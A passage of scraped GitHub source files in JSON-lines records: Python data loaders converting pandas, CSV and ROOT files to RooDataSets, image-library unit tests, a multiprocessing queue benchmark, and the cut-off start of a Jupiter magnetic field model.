is not needed. Otherwise it has to be specified.\n + `acceptance`: Load an acceptance. This needs to be accompanied with a weight\n specification, either in `weights-to-normalize` or `weights-not-to-normalize`, which\n is either `acceptance_fit` or `acceptance_gen`. Depending on which one is\n specified, `acceptance.get_fit_weights` or `acceptance.get_gen_weights` is used.\n + `categories`: RooCategory variables to use.\n + `ranges`: Dictionary specifying min and max for the given variables. If not given,\n variables are unbound.\n\n Arguments:\n file_name (str): File to load.\n tree_name (str): Tree to load.\n **kwargs (dict): Extra configuration.\n\n Return:\n ROOT.RooDataSet: pandas.DataFrame converted to RooDataSet.\n\n Raise:\n KeyError: If there are errors in the `kwargs` variables.\n ValueError: If there is an error in loading the acceptance.\n\n \"\"\"\n logger.debug(\"Loading pandas DataFrame in RooDataSet format\")\n # Checks and variable preparation\n try:\n name = kwargs['name']\n title = kwargs.get('title', name)\n except KeyError as error:\n raise KeyError(\"Missing configuration key -> {}\".format(error))\n # Check weights\n try:\n weight_var, weights_to_normalize, weights_not_to_normalize = _analyze_weight_config(kwargs)\n except KeyError:\n raise KeyError(\"Badly specified weights\")\n # Variables\n var_list = list(frame.columns)\n # Raise an error if some weights are not loaded.\n if var_list and not set(weights_to_normalize+weights_not_to_normalize).issubset(set(var_list)):\n raise ValueError(\"Missing weights in the list of variables read from input file.\")\n acc_var = ''\n # Acceptance specified\n if 'acceptance' in kwargs:\n if any('acceptance_fit' in weights\n for weights in (weights_to_normalize, weights_not_to_normalize)):\n acc_var = 'acceptance_fit'\n if any('acceptance_gen' in weights\n for weights in (weights_to_normalize, weights_not_to_normalize)):\n if acc_var:\n raise ValueError(\"Specified both 'acceptance_fit' and 'acceptance_gen' as weights.\")\n acc_var = 'acceptance_gen'\n if not acc_var:\n logger.warning(\"Requested acceptance but it has not been specified as a weight to use. Ignoring.\")\n\n if weight_var:\n if 'acceptance' in kwargs:\n if any('acceptance_fit' in weights\n for weights in (weights_to_normalize, weights_not_to_normalize)):\n acc_var = 'acceptance_fit'\n if any('acceptance_gen' in weights\n for weights in (weights_to_normalize, weights_not_to_normalize)):\n if acc_var:\n raise ValueError(\"Specified both 'acceptance_fit' and 'acceptance_gen' as weights.\")\n acc_var = 'acceptance_gen'\n if not acc_var:\n logger.warning(\"Requested acceptance but it has not been specified as a weight to use. Ignoring.\")\n if acc_var:\n from analysis.efficiency import get_acceptance\n try:\n acceptance = get_acceptance(kwargs['acceptance'])\n except Exception as error:\n raise ValueError(str(error))\n if acc_var in frame.columns:\n raise ValueError(\"Name clash: the column '{}' is present in the dataset\".format(acc_var))\n if acc_var == 'acceptance_fit':\n frame['acceptance_fit'] = acceptance.get_fit_weights(frame)\n else:\n frame['acceptance_gen'] = acceptance.get_gen_weights(frame)\n # Apply weights\n if weight_var:\n frame[weight_var] = np.prod([frame[w_var] for w_var in weights_to_normalize],\n axis=0)\n frame[weight_var] = frame[weight_var]/frame[weight_var].sum()*frame.shape[0]\n frame[weight_var] = np.prod([frame[w_var] for w_var in weights_not_to_normalize + [weight_var]],\n axis=0)\n if var_list is not None and weight_var:\n var_list.append(weight_var)\n # Process ranges\n ranges = kwargs.get('ranges')\n if ranges:\n for var_name, range_val in ranges.items():\n try:\n if isinstance(range_val, str):\n min_, max_ = range_val.split()\n else:\n min_, max_ = range_val\n except ValueError:\n raise KeyError(\"Malformed range specification for {} -> {}\".format(var_name, range_val))\n ranges[var_name] = (float(min_), float(max_))\n # Convert it\n return dataset_from_pandas(frame, name, title,\n var_list=var_list,\n weight_var=weight_var,\n categories=kwargs.get('categories'),\n ranges=ranges)\n\n\n###############################################################################\n# Load pandas files\n###############################################################################\ndef _load_pandas(file_name, tree_name, kwargs):\n \"\"\"Load the pandas dataset.\n\n Arguments:\n file_name (str): File to load.\n tree_name (str): Tree to load.\n kwargs (dict): Optional configuration keys.\n\n Optional keys are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n + `weights-to-normalize`: Variables defining the weights that are normalized\n to the total number of entries of the dataset.\n + `weights-not-to-normalize`: Variables defining the weights that are not normalized.\n + `weight-var-name`: Name of the weight variable. If there is only one weight,\n it is not needed. Otherwise it has to be specified.\n\n Return:\n pandas.DataFrame\n\n Raise:\n OSError: If the input file does not exist.\n KeyError: If the tree is not found or some of the requested branches are missing.\n ValueError: If the weights are not properly specified.\n\n \"\"\"\n selection = kwargs.get('selection')\n # Check weights\n try:\n _, weights_to_normalize, weights_not_to_normalize = _analyze_weight_config(kwargs)\n except KeyError:\n raise ValueError(\"Badly specified weights\")\n # Variables\n variables = kwargs.get('variables')\n if variables is not None:\n variables = list(set(variables +\n weights_to_normalize +\n weights_not_to_normalize))\n if not os.path.exists(file_name):\n raise OSError(\"Cannot find input file -> {}\".format(file_name))\n with pd.HDFStore(file_name, 'r') as store:\n if tree_name not in store:\n raise KeyError(\"Cannot find tree in input file -> {}\".format(tree_name))\n if selection:\n output_data = store[tree_name].query(selection)\n if variables:\n output_data = output_data[variables]\n else:\n try:\n output_data = store.select(tree_name, columns=variables)\n except TypeError:\n logger.warning(\"Column specification given for loading a fixed store. Loading will be slower.\")\n output_data = store.select(tree_name)\n if variables:\n output_data = output_data[variables]\n return output_data\n\n\ndef get_pandas_from_pandas_file(file_name, tree_name, kwargs):\n \"\"\"Load a pandas DataFrame from HDF file.\n\n Optional keys in `kwargs` are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n\n Arguments:\n file_name (str): File to load.\n tree_name (str): Tree to load.\n **kwargs (dict): Extra configuration.\n\n \"\"\"\n logger.debug(\"Loading pandas file in pandas format -> %s:%s\",\n file_name, tree_name)\n return _load_pandas(file_name, tree_name, kwargs)\n\n\ndef get_root_from_pandas_file(file_name, tree_name, kwargs):\n \"\"\"Load a pandas HDF file into a `ROOT.RooDataSet`.\n\n Needed keys in `kwargs` are:\n + `name`: Name of the `RooDataSet`.\n + `title`: Title of the `RooDataSet`.\n\n Optional keys are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n + `weights-to-normalize`: Variables defining the weights that are normalized\n to the total number of entries of the dataset.\n + `weights-not-to-normalize`: Variables defining the weights that are not normalized.\n + `weight-var-name`: Name of the weight variable. If there is only one weight,\n it is not needed. Otherwise it has to be specified.\n + `acceptance`: Load an acceptance. This needs to be accompanied with a weight\n specification, either in `weights-to-normalize` or `weights-not-to-normalize`, which\n is either `acceptance_fit` or `acceptance_gen`. Depending on which one is\n specified, `acceptance.get_fit_weights` or `acceptance.get_gen_weights` is used.\n + `categories`: RooCategory variables to use.\n\n Arguments:\n file_name (str): File to load.\n tree_name (str): Tree to load.\n **kwargs (dict): Extra configuration.\n\n Return:\n ROOT.RooDataSet: pandas.DataFrame converted to RooDataSet.\n\n Raise:\n KeyError: If there are errors in the `kwargs` variables.\n ValueError: If there is an error in loading the acceptance.\n\n \"\"\"\n logger.debug(\"Loading pandas file in RooDataSet format -> %s:%s\",\n file_name, tree_name)\n return _get_root_from_dataframe(_load_pandas(file_name, tree_name, kwargs),\n kwargs)\n\n\n###############################################################################\n# Load CSV files\n###############################################################################\ndef _load_csv(file_name, kwargs):\n \"\"\"Load a pandas dataset from a CSV file.\n\n Arguments:\n file_name (str): File to load.\n kwargs (dict): Configuration: `selection` and `variables`.\n\n Return:\n pandas.DataFrame\n\n Raise:\n OSError: If the input file does not exist.\n KeyError: If the tree is not found or some of the requested branches are missing.\n\n \"\"\"\n if not os.path.exists(file_name):\n raise OSError(\"Cannot find input file -> {}\".format(file_name))\n output_data = pd.read_csv(file_name)\n selection = kwargs.get('selection')\n if selection:\n output_data = output_data.query(selection)\n variables = kwargs.get('variables')\n if variables:\n output_data = output_data[variables]\n return output_data\n\n\ndef get_pandas_from_csv_file(file_name, _, kwargs):\n \"\"\"Load a pandas DataFrame from CSV file.\n\n Optional keys in `kwargs` are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n\n Arguments:\n file_name (str): File to load.\n **kwargs (dict): Extra configuration.\n\n \"\"\"\n logger.debug(\"Loading CSV file in pandas format -> %s\", file_name)\n return _load_csv(file_name, kwargs)\n\n\ndef get_root_from_csv_file(file_name, _, kwargs):\n \"\"\"Load a CSV file into a `ROOT.RooDataSet`.\n\n Needed keys in `kwargs` are:\n + `name`: Name of the `RooDataSet`.\n + `title`: Title of the `RooDataSet`.\n\n Optional keys are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n + `weights-to-normalize`: Variables defining the weights that are normalized\n to the total number of entries of the dataset.\n + `weights-not-to-normalize`: Variables defining the weights that are not normalized.\n + `weight-var-name`: Name of the weight variable. If there is only one weight,\n it is not needed. Otherwise it has to be specified.\n + `acceptance`: Load an acceptance. This needs to be accompanied with a weight\n specification, either in `weights-to-normalize` or `weights-not-to-normalize`, which\n is either `acceptance_fit` or `acceptance_gen`. Depending on which one is\n specified, `acceptance.get_fit_weights` or `acceptance.get_gen_weights` is used.\n + `categories`: RooCategory variables to use.\n\n Arguments:\n file_name (str): File to load.\n **kwargs (dict): Extra configuration.\n\n Return:\n ROOT.RooDataSet: pandas.DataFrame converted to RooDataSet.\n\n Raise:\n KeyError: If there are errors in the `kwargs` variables.\n ValueError: If there is an error in loading the acceptance.\n\n \"\"\"\n logger.debug(\"Loading CSV file in RooDataSet format -> %s\", file_name)\n return _get_root_from_dataframe(_load_csv(file_name, kwargs), kwargs)\n\n\n###############################################################################\n# Load ROOT files\n###############################################################################\ndef get_root_from_root_file(file_name, tree_name, kwargs):\n \"\"\"Load a ROOT tree into a `ROOT.RooDataSet`.\n\n Needed keys in `kwargs` are:\n + `name`: Name of the `RooDataSet`.\n + `title`: Title of the `RooDataSet`.\n\n Optional keys are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n + `ranges`: Range to apply to some variables.\n\n Arguments:\n file_name (str): File to load.\n tree_name (str): Tree to load.\n kwargs (dict): Extra configuration.\n\n Return:\n ROOT.RooDataSet: ROOT file converted to RooDataSet.\n\n Raise:\n KeyError: If there are errors in `kwargs`.\n ValueError: If the requested variables cannot be found in the input file.\n OSError: If the ROOT file cannot be found.\n\n \"\"\"\n def get_list_of_leaves(tree):\n \"\"\"Get list of leave names from a tree matching a certain regex.\n\n Arguments:\n tree (`ROOT.TTree`): Tree to extract the leaves from.\n\n Return:\n list: Leaves of the tree.\n\n \"\"\"\n object_list = tree.GetListOfLeaves()\n it = object_list.MakeIterator()\n output = set()\n for _ in range(object_list.GetSize()):\n obj = it.Next()\n if obj:\n output.add(obj.GetName())\n return output \n\n logger.debug(\"Loading ROOT file in RooDataSet format -> %s:%s\",\n file_name, tree_name)\n if not os.path.exists(file_name):\n raise OSError(\"Cannot find input file -> {}\".format(file_name))\n try:\n name = kwargs['name']\n title = kwargs.get('title', name)\n except KeyError as error:\n raise KeyError(\"Missing configuration key -> {}\".format(error))\n tfile = ROOT.TFile.Open(file_name)\n tree = tfile.Get(tree_name)\n if not tree:\n raise KeyError(\"Cannot find tree in input file -> {}\".format(tree_name))\n leaves = get_list_of_leaves(tree)\n variables = set(kwargs.get('variables', leaves))\n # Acceptance\n if 'acceptance' in kwargs:\n raise NotImplementedError(\"Acceptance weights are not implemented for ROOT files\")\n # Check weights\n try:\n weight_var, weights_to_normalize, weights_not_to_normalize = _analyze_weight_config(kwargs)\n except KeyError:\n raise KeyError(\"Badly specified weights\")\n if variables and weight_var:\n variables = set(variables) | set(weights_to_normalize) | set(weights_not_to_normalize)\n # Crosscheck leaves\n if variables - leaves:\n raise ValueError(\"Cannot find leaves in input -> {}\".format(variables - leaves))\n selection = kwargs.get('selection')\n leave_set = ROOT.RooArgSet()\n leave_list = []\n if selection:\n selection_expr = formulate.from_root(selection)\n for var in selection_expr.variables.union(variables):\n leave_list.append(ROOT.RooRealVar(var, var, 0.0))\n leave_set.add(leave_list[-1])\n name = ''.join(random.SystemRandom().choice(string.ascii_letters + string.digits)\n for _ in range(10))\n temp_ds = ROOT.RooDataSet(name, name,\n leave_set,\n ROOT.RooFit.Import(tree),\n ROOT.RooFit.Cut(selection))\n destruct_object(tree)\n tree = temp_ds\n var_set = ROOT.RooArgSet()\n var_list = {}\n for var in variables:\n var_list[var] = ROOT.RooRealVar(var, var, 0.0)\n var_set.add(var_list[var])\n if kwargs.get('ranges'):\n for var_name, range_val in kwargs['ranges'].items():\n if var_name not in var_list:\n raise KeyError(\"Range specified for a variable not included in the dataset -> {}\".format(var_name))\n try:\n if isinstance(range_val, str):\n min_, max_ = range_val.split()\n else:\n min_, max_ = range_val\n except ValueError:\n raise KeyError(\"Malformed range specification for {} -> {}\".format(var_name, range_val))\n var_set[var_name].setMin(float(min_))\n var_set[var_name].setMax(float(max_))\n dataset = ROOT.RooDataSet(name, title, var_set, ROOT.RooFit.Import(tree))\n if weight_var:\n # Weights to normalize\n to_normalize_w = ROOT.RooFormulaVar(\"{}_not_normalized\".format(weight_var),\n \"{}_not_normalized\".format(weight_var),\n \"*\".join(weights_to_normalize),\n list_to_rooarglist(var_list[weight] for weight in weights_to_normalize))\n var_set.append(to_normalize_w)\n dataset.addColumn(to_normalize_w)\n sum_weights = sum(dataset.get(entry)[\"{}_not_normalized\".format(weight_var)].getVal()\n for entry in dataset.sumEntries())\n normalized_w = ROOT.RooFormulaVar(\"{}_normalized\".format(weight_var),\n \"{}_normalized\".format(weight_var),\n \"{}_not_normalized/{}\".format(weight_var, sum_weights),\n ROOT.RooArgList(to_normalize_w))\n var_set.append(normalized_w)\n dataset.addColumn(normalized_w)\n # Non-normalized weights\n weights = ROOT.RooFormulaVar(weight_var,\n weight_var,\n \"*\".join(weights_not_to_normalize + [\"{}_normalized\".format(weight_var)]),\n list_to_rooarglist([var_list[weight] for weight in weights_not_to_normalize] +\n [normalized_w]))\n var_set.append(weights)\n dataset.addColumn(weights)\n dataset_w = ROOT.RooDataSet(name, title, var_set,\n ROOT.RooFit.Import(dataset),\n ROOT.RooFit.WeightVar(weight_var))\n destruct_object(dataset)\n dataset = dataset_w\n # ROOT Cleanup\n destruct_object(tree)\n tfile.Close()\n destruct_object(tfile)\n if selection:\n for leave in leave_list:\n destruct_object(leave)\n for var in variables:\n destruct_object(var_list[var])\n # Let's return\n dataset.SetName(name)\n dataset.SetTitle(title)\n return dataset\n\n\ndef get_pandas_from_root_file(file_name, tree_name, kwargs):\n \"\"\"Load a pandas DataFrame from a ROOT file.\n\n Optional keys in `kwargs` are:\n + `variables`: List of variables to load.\n + `selection`: Selection to apply.\n\n Arguments:\n file_name (str): File to load.\n tree_name (str): Tree to load.\n kwargs (dict): Extra configuration.\n\n Return:\n pandas.DataFrame: ROOT file converted to pandas.\n\n \"\"\"\n logger.debug(\"Loading ROOT file in pandas format -> %s:%s\",\n file_name, tree_name)\n if not os.path.exists(file_name):\n raise OSError(\"Cannot find input file -> {}\".format(file_name))\n selection = kwargs.get('selection')\n variables = kwargs.get('variables', [])\n if selection:\n selection_expr = formulate.from_numexpr(selection)\n full_variables = variables + list(selection_expr.variables)\n output_data = read_root(file_name, tree_name, columns=full_variables).query(selection)\n if variables:\n output_data = output_data[variables]\n else:\n output_data = read_root(file_name, tree_name, columns=variables)\n return output_data\n\n\n# EOF\n","repo_name":"apuignav/analysis-tools","sub_path":"analysis/data/loaders.py","file_name":"loaders.py","file_ext":"py","file_size_in_byte":23962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"15922017165","text":"\"\"\"\nUnit tests for `dh.image`.\n\"\"\"\n\nimport tempfile\nimport unittest\n\nimport numpy as np\n\nimport dh.data\nimport dh.image\n\n\nclass Test(unittest.TestCase):\n def test_save_load_decode(self):\n # images to be saved\n (_, filename) = tempfile.mkstemp(suffix=\".png\")\n C8 = dh.data.lena()\n C16 = np.array(C8, dtype=\"uint16\")\n G8 = dh.image.asgray(C8)\n G16 = dh.image.asgray(C16)\n\n for I in (C8, C16, G8, G16):\n for color in (None, False, True):\n # save image\n dh.image.save(filename, I)\n\n # load image from file\n J = dh.image.load(filename, color=color)\n\n # decode image from byte array\n with open(filename, \"rb\") as f:\n K = dh.image.decode(f.read(), color=color)\n\n # make sure that load and decode are identical\n self.assertEqual(J.shape, K.shape)\n self.assertEqual(J.dtype, K.dtype)\n self.assertTrue(np.all(J == K))\n\n # expected image\n if color or ((color is None) and dh.image.iscolor(I)):\n E = dh.image.ascolor(I)\n else:\n E = dh.image.asgray(I)\n\n # compare loaded image with expected image\n self.assertEqual(J.dtype, E.dtype)\n self.assertEqual(J.shape, E.shape)\n if color in (None, True):\n # if I is a color image and color=False, then the conversion to gray scale will be performed by OpenCV, which is different than dh.image.asgray\n self.assertTrue(np.all(J == E))\n\n\n def test_stack(self):\n # images\n L = dh.data.lena()\n M = dh.image.convert(dh.data.M(300, 200).astype(\"uint16\"), \"uint8\")\n G1 = dh.data.grid([350, 500])\n G2 = dh.data.grid([200, 200])\n P = dh.data.pal()\n\n # test default stacking\n S = dh.image.stack([[L, M], [G1, G2], [P]])\n self.assertEqual(S.shape, (1438, 768, 3))\n self.assertEqual(S.dtype, np.uint8)\n self.assertAlmostEqual(S.mean(), 89.258657616674398)\n\n # test default stacking with a 1D image vector (one row)\n S = dh.image.stack([L, M, G1, G2, P])\n self.assertEqual(S.shape, (576, 2180, 3))\n self.assertEqual(S.dtype, np.uint8)\n self.assertAlmostEqual(S.mean(), 78.503944741760108)\n\n # test stacking with padding\n S = dh.image.stack([[L, M], [G1, G2], [P]], padding=32)\n self.assertEqual(S.shape, (1566, 832, 3))\n self.assertEqual(S.dtype, np.uint8)\n self.assertAlmostEqual(S.mean(), 75.658089981006654)\n\n # test stacking with forced dtype\n S = dh.image.stack([[L, M], [G1, G2], [P]], dtype=\"float\")\n self.assertEqual(S.shape, (1438, 768, 3))\n self.assertEqual(S.dtype, np.float)\n self.assertAlmostEqual(S.mean(), 0.35003395143793881)\n\n # test stacking with forced gray mode\n S = dh.image.stack([[L, M], [G1, G2], [P]], gray=True)\n self.assertEqual(S.shape, (1438, 768))\n self.assertEqual(S.dtype, np.uint8)\n self.assertAlmostEqual(S.mean(), 89.139465982846545)\n\n def test_text(self):\n I = dh.data.lena()\n dh.image.text(I, \"The quick brown fox jumps over the lazy dog.\")\n for nChannel in range(3):\n self.assertEqual(I[0, 0, nChannel], 0)\n self.assertAlmostEqual(I.mean(), 121.48126602172852)\n\n def test_convert_fromBool(self):\n # create bool image\n L = dh.data.lena()\n L = dh.image.asgray(L)\n L = (L > 127)\n m = L.mean()\n\n C = dh.image.convert(L, \"uint8\")\n self.assertAlmostEqual(C.mean(), 255.0 * m)\n\n C = dh.image.convert(L, \"uint16\")\n self.assertAlmostEqual(C.mean(), 65535.0 * m)\n\n C = dh.image.convert(L, \"float\")\n self.assertAlmostEqual(C.mean(), m)\n\n def test_convert_toFloat(self):\n L = dh.data.lena()\n\n # test conversion to float\n C = dh.image.convert(L, \"float\")\n self.assertEqual(C.shape, (512, 512, 3))\n self.assertEqual(C.dtype, np.float)\n self.assertAlmostEqual(C.mean(), 0.50285637550104678)\n\n def test_colorize(self):\n I = dh.data.lena()\n C = dh.image.colorize(I, \"jet\")\n self.assertEqual(I.shape, C.shape)\n self.assertEqual(C[128, 256, 1], 174)\n self.assertEqual(C[256, 128, 2], 64)\n ms = (180.22365951538086, 99.051216125488281, 105.41025161743164)\n for nChannel in range(3):\n mHat = I[:, :, nChannel].mean()\n self.assertAlmostEqual(mHat, ms[nChannel])\n\n def test_colorize_all(self):\n \"\"\"\n Colorize slope image with all available colormaps\n \"\"\"\n\n # slope image\n I = np.arange(256).reshape(1, -1).astype(\"uint8\")\n self.assertEqual(I.shape, (1, 256))\n\n # use each colormap...\n cs = dh.data.colormaps()\n self.assertIsInstance(cs, dict)\n self.assertGreaterEqual(len(cs), 75)\n for (cName, c) in cs.items():\n # ... to colorize the slope and check the result\n C = dh.image.colorize(I, c)\n self.assertEqual(I.shape + (3,), C.shape)\n for nPixel in range(256):\n if nPixel in c:\n # check colorized result vs. colormap\n for nChannel in range(3):\n self.assertEqual(C[0, nPixel, nChannel], c[nPixel][nChannel])\n else:\n # no color available in colormap - should be colored as black\n for nChannel in range(3):\n self.assertEqual(C[0, nPixel, nChannel], 0)\n\n def test_gamma(self):\n I = dh.data.lena()\n G = dh.image.gamma(I, 0.5)\n self.assertEqual(I.shape, G.shape)\n self.assertAlmostEqual(G.mean(), 174.81550725301108)\n\n def test_resize(self):\n I = dh.data.lena()\n R = dh.image.resize(I, 0.5)\n self.assertEqual(R.shape, (256, 256, 3))\n\n def test_tir(self):\n self.assertEqual(\n dh.image.tir(np.array([-3.81, 2.97]) * 0.5),\n (-2, 1)\n )\n\n #def test_","repo_name":"dhaase-de/dh-python-dh","sub_path":"dh/tests/test_image.py","file_name":"test_image.py","file_ext":"py","file_size_in_byte":6216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"9265808530","text":"import multiprocessing as mp\nimport time\nfrom multiprocessing import Process\nfrom typing import Optional, Tuple\n\nimport matplotlib as mpl\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom matplotlib.ticker import FormatStrFormatter\n\nfrom treequeues import TreeQueue, SimpleTreeQueue\n\nNUM_ITEMS = 200\nQUEUE_MAXSIZE = 10\nMEGABYTES_LIST = [1., 5., 10., 20, 50, 100]\n\n\nclass CatchTime:\n def __enter__(self):\n self.initial_value = time.perf_counter()\n self.value: Optional[float] = None\n return self\n\n def __exit__(self, exc_type, exc_value, exc_traceback):\n self.value = time.perf_counter() - self.initial_value\n\n\nclass GetProcess(Process):\n def __init__(self, queue_data, queue_time: mp.Queue, barrier: mp.Barrier, num_iterations: int):\n super().__init__()\n self.queue_data = queue_data\n self.queue_time = queue_time\n self.barrier = barrier\n self.num_iterations = num_iterations\n\n def run(self):\n time_list = []\n self.barrier.wait()\n\n for i in range(self.num_iterations):\n start_time = time.perf_counter()\n self.queue_data.get()\n time_list.append(time.perf_counter() - start_time)\n for t in time_list:\n self.queue_time.put(t)\n self.queue_time.put(None)\n\n\nclass PutProcess(Process):\n def __init__(self, queue, barrier: mp.Barrier, num_iterations: int, data):\n super().__init__()\n self.queue = queue\n self.barrier = barrier\n self.num_iterations = num_iterations\n self.data = data\n\n def run(self):\n self.barrier.wait()\n for i in range(self.num_iterations):\n self.queue.put(self.data)\n\n\ndef get_tree(num_items: int, array_size: int):\n return {i: np.random.random(array_size) for i in range(num_items)}\n\n\ndef run_single_performance_test(\n num_processes: int,\n megabytes: int,\n num_tree_items: int,\n treequeue_type: str,\n maxsize: int = QUEUE_MAXSIZE\n) -> Tuple[float, float]:\n barrier = mp.Barrier(num_processes * 2)\n array_size = int(megabytes * 1_000_000 / (num_tree_items * 8))\n data = get_tree(num_tree_items, array_size)\n queue_time = mp.Queue()\n\n if treequeue_type == 'TreeQueue':\n queue_data = TreeQueue(data, maxsize=maxsize)\n elif treequeue_type == 'SimpleTreeQueue':\n queue_data = SimpleTreeQueue(data, maxsize=maxsize)\n elif treequeue_type == 'Queue':\n queue_data = mp.Queue(maxsize=maxsize)\n else:\n raise NameError\n\n process_list = []\n for _ in range(num_processes):\n process = GetProcess(\n queue_data=queue_data,\n queue_time=queue_time,\n barrier=barrier,\n num_iterations=int(NUM_ITEMS/num_processes),\n )\n process.start()\n process_list.append(process)\n\n process_list = []\n for _ in range(num_processes):\n process = PutProcess(\n queue=queue_data,\n barrier=barrier,\n num_iterations=int(NUM_ITEMS/num_processes),\n data=data,\n )\n process.start()\n process_list.append(process)\n\n for process in process_list:\n process.join()\n\n time_list = []\n none_counter = 0\n while none_counter < num_processes:\n data = queue_time.get()\n if data is None:\n none_counter += 1\n else:\n time_list.append(data)\n\n return float(np.mean(time_list)), float(np.std(time_list))\n\n\ndef run_benchmark_performance():\n plt.rc('text', usetex=False)\n plt.rc('font', family='serif')\n plt.rcParams['figure.dpi'] = 300\n mpl.rcParams.update({'font.size': 14})\n\n num_processes = 1\n megabytes_list = MEGABYTES_LIST\n\n fig, (axe_1, axe_2, axe_3) = plt.subplots(1, 3, figsize=(12.5, 4), sharey='all')\n\n experiences = {\n 'Queue': {\n '1 item': {'num_tree_items': 1, 'color': 'r', 'linestyle': '-', 'axe': axe_1},\n '10 items': {'num_tree_items': 10, 'color': 'r', 'linestyle': '-', 'axe': axe_2},\n '100 items': {'num_tree_items': 100, 'color': 'r', 'linestyle': '-', 'axe': axe_3},\n },\n 'TreeQueue': {\n '1 item': {'num_tree_items': 1, 'color': 'k', 'linestyle': '-', 'axe': axe_1},\n '10 items': {'num_tree_items': 10, 'color': 'k', 'linestyle': '-', 'axe': axe_2},\n '100 items': {'num_tree_items': 100, 'color': 'k', 'linestyle': '-', 'axe': axe_3},\n },\n }\n\n minimum = 1\n for queue_type, experience_dict in experiences.items():\n for experience_name, parameters in experience_dict.items():\n print(f'{queue_type}: {experience_name}')\n\n std_list = []\n mean_list = []\n for megabytes in megabytes_list:\n mean, std = run_single_performance_test(\n num_processes=num_processes,\n megabytes=megabytes,\n num_tree_items=parameters['num_tree_items'],\n treequeue_type=queue_type,\n )\n minimum = min(minimum, 0.4*mean)\n mean_list.append(mean)\n std_list.append(std)\n\n parameters['axe'].errorbar(\n megabytes_list, mean_list, std_list, ecolor=parameters['color'], color=parameters['color'],\n linestyle=parameters['linestyle'], linewidth=1.5, label=f'{queue_type}',\n capsize=3, capthick=1.5)\n parameters['axe'].set_yscale('log')\n parameters['axe'].set_xscale('log')\n parameters['axe'].grid(linestyle='dotted', )\n parameters['axe'].grid(linestyle='dotted')\n parameters['axe'].set_title(f'Nested array composed of {experience_name}', fontsize=14)\n parameters['axe'].tick_params(axis='both', which='both', labelsize=13)\n parameters['axe'].yaxis.set_tick_params(labelbottom=True)\n parameters['axe'].xaxis.set_major_formatter(FormatStrFormatter('%.0f'))\n\n axe_2.set_xlabel(r'Nested array size (megabytes)', fontsize=13)\n axe_1.set_ylabel(fr'Time to send {NUM_ITEMS} nested arrays (s)', fontsize=13)\n axe_1.set_ylim(ymin=minimum)\n fig.suptitle('Queue performance (s) versus object size (megabytes)', y=0.96)\n handles, labels = plt.gca().get_legend_handles_labels()\n axe_3.legend(handles, labels, loc='lower right')\n plt.subplots_adjust(left=0.1, right=0.9, bottom=0.06, top=0.9)\n plt.tight_layout()\n plt.savefig('benchmark_performance.png', dpi=300)\n plt.show()\n\n\ndef run_benchmark_multiprocessing():\n plt.rc('text', usetex=False)\n plt.rc('font', family='serif')\n plt.rcParams['figure.dpi'] = 300\n mpl.rcParams.update({'font.size': 14})\n\n num_tree_items = 10\n megabytes_list = MEGABYTES_LIST\n\n fig, (axe_1, axe_2) = plt.subplots(1, 2, figsize=(8.5, 5), sharey='all')\n\n experiences = {\n 'Queue': {\n '1 process': {'num_processes': 1, 'color': 'r', 'linestyle': '-', 'axe': axe_1},\n '8 processes': {'num_processes': 8, 'color': 'r', 'linestyle': '-', 'axe': axe_2},\n },\n 'TreeQueue': {\n '1 process': {'num_processes': 1, 'color': 'k', 'linestyle': '-', 'axe': axe_1},\n '8 processes': {'num_processes': 8, 'color': 'k', 'linestyle': '-', 'axe': axe_2},\n },\n 'SimpleTreeQueue': {\n '1 process': {'num_processes': 1, 'color': 'b', 'linestyle': '-', 'axe': axe_1},\n '8 processes': {'num_processes': 8, 'color': 'b', 'linestyle': '-', 'axe': axe_2},\n },\n }\n\n minimum = 1\n for queue_type, experience_dict in experiences.items():\n for experience_name, parameters in experience_dict.items():\n print(f'{queue_type}: {experience_name}')\n\n std_list = []\n mean_list = []\n for megabytes in megabytes_list:\n with CatchTime() as ct:\n mean, std = run_single_performance_test(\n num_processes=parameters['num_processes'],\n megabytes=megabytes,\n num_tree_items=num_tree_items,\n treequeue_type=queue_type,\n )\n print(parameters['num_processes'], ct.value)\n\n minimum = min(minimum, 0.3*mean)\n mean_list.append(mean)\n std_list.append(std)\n\n parameters['axe'].errorbar(\n megabytes_list, mean_list, std_list, ecolor=parameters['color'], color=parameters['color'],\n linestyle=parameters['linestyle'], linewidth=1.5, label=f'{queue_type}',\n capsize=3, capthick=1.5)\n parameters['axe'].set_yscale('log')\n parameters['axe'].set_xscale('log')\n parameters['axe'].grid(linestyle='dotted')\n parameters['axe'].grid(linestyle='dotted')\n parameters['axe'].set_title(f'Experiment using {parameters[\"num_processes\"]*2} processes', fontsize=15)\n parameters['axe'].tick_params(axis='both', which='both', labelsize=13)\n parameters['axe'].yaxis.set_tick_params(labelbottom=True)\n parameters['axe'].xaxis.set_major_formatter(FormatStrFormatter('%.0f'))\n\n axe_1.set_ylabel(fr'Time to send {NUM_ITEMS} nested arrays per process (s)', fontsize=13)\n fig.supxlabel(r'Nested array size (megabytes)', fontsize=13, y=0.066)\n axe_1.set_ylim(ymin=minimum)\n fig.suptitle('Queue performance (s) versus object size (megabytes)\\nwith nested arrays composed of 10 items', y=0.96)\n axe_2.legend(loc='lower right')\n plt.subplots_adjust(left=0.1, right=0.9, bottom=0, top=0.9)\n plt.tight_layout()\n plt.savefig('benchmark_multiprocessing.png', dpi=300)\n plt.show()\n\n\nif __name__ == '__main__':\n run_benchmark_performance()\n run_benchmark_multiprocessing()\n","repo_name":"thomashirtz/treequeues","sub_path":"benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":9835,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"11958086840","text":"import numpy as np\nfrom Magnetic_field_models import field_models\n\n\n\ndef equatorialMagneticField(r, phi):\n \"\"\"\n Finds the equatorial magnetic field strength using Vogt et. al 2011 method\n :param r: The radius in R_J\n :param phi: The angle in radians, 0 at the Sun, anti-clockwise\n :return: The equatorial magnetic field in nT\n \"\"\"\n B = 1.030e6 * r ** (-3.756 